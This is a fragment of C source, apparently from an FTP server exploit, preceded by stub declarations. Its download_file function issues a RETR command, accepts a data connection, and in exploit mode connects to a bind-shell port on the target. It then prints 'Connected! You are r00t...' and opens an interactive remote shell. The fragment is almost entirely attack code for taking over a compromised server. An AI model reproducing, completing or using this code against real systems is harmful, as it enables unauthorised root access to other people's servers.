
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int dummy; } ;
struct sockaddr {int dummy; } ;
typedef int localServer ;


 int BINDSHELL_PORT ;
 int EXPLOIT_DOWNLOAD ;
 int FAILURE ;
 int SUCCESS ;
 int check_status () ;
 int close (int) ;
 int connect_to_server (int ) ;
 int controlSock ;
 int create_passive_server () ;
 int do_remote_shell (int) ;
 int exit (int ) ;
 int filename ;
 int memset (struct sockaddr_in*,int ,int) ;
 int my_recv (int) ;
 int my_send (int,char*,int ) ;
 int printf (char*) ;
 int status_bar (char*) ;
 int timeout_accept (int,struct sockaddr*,int*) ;

int download_file(int mode)
{
int len, localServerSock, dataSock, bindShellSock;
struct sockaddr_in localServer;

status_bar("Downloading");

my_send(controlSock, "RETR %s\r\n", filename);



memset(&localServer,0,sizeof(localServer));
localServerSock=create_passive_server();
len=sizeof(localServer);


if((dataSock=timeout_accept(localServerSock,(struct sockaddr *)&localServer,&len))<0) {
close(localServerSock);
return FAILURE;
}





if(mode==EXPLOIT_DOWNLOAD) {
if((bindShellSock=connect_to_server(BINDSHELL_PORT))>=0) {
printf("\nConnected! You are r00t...\n");
do_remote_shell(bindShellSock);
printf("\nDid you have a nice time?\n");
exit(0);
}
close(dataSock);
close(localServerSock);
return SUCCESS;
}




my_recv(dataSock);
close(dataSock);
close(localServerSock);
my_recv(controlSock);
return check_status();
}
